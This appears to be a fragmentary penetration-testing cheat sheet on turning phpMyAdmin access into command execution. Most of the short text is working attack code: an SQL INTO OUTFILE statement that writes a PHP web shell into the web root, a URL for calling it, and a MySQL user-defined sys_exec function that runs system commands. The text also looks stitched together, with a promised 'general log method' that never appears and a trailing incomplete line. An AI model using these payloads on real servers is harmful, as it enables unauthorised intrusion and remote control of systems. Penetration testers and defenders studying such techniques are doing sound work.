Phpmyadmin Hacktricks -

SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE "/var/www/html/shell.php"; Then call it: http://target.com/shell.php?c=id If secure_file_priv is set (prevents INTO OUTFILE ), use the general log method:

For pentesters: always check for phpMyAdmin early. For defenders: assume it will be discovered, and harden accordingly.

CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so'; SELECT sys_exec('whoami > /tmp/test.txt'); Check your current privileges: